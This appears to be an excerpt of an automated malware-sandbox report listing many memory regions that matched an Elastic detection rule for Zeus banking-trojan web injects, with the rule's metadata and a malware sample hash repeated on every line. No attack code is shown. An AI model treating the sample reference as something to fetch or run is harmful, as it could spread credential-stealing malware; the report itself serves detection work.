Source: 00000002.00000003.1993648247.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1973545656.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000006.00000002.1835795519.00000000013E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000008.00000002.1842592106.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000D.00000002.1895695128.0000000002D60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1951729466.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000008.00000002.1844960712.0000000001510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1727160280.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000005.00000002.1860005149.00000000011C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1989210596.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1953838270.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001C.00000002.2003048692.0000000002AA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1952570956.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1987381593.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000024.00000002.2019868965.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001C.00000002.1961721864.0000000002700000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1833788305.000000000E440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1990556597.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1990141474.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1908832402.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001F.00000002.1989491611.00000000028D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1951475762.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1785353535.000000000E040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2613697268.00000000026A3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000013.00000002.1817738450.0000000002550000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001A.00000002.1912799660.0000000000620000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1992609044.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1986892750.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001F.00000002.2028413256.0000000002AD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1990784725.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1973353596.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1993059041.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000024.00000002.2034641560.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1768859542.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000018.00000002.1854156512.0000000002C70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1810638614.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1963515369.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1973821759.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000D.00000002.1889058917.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
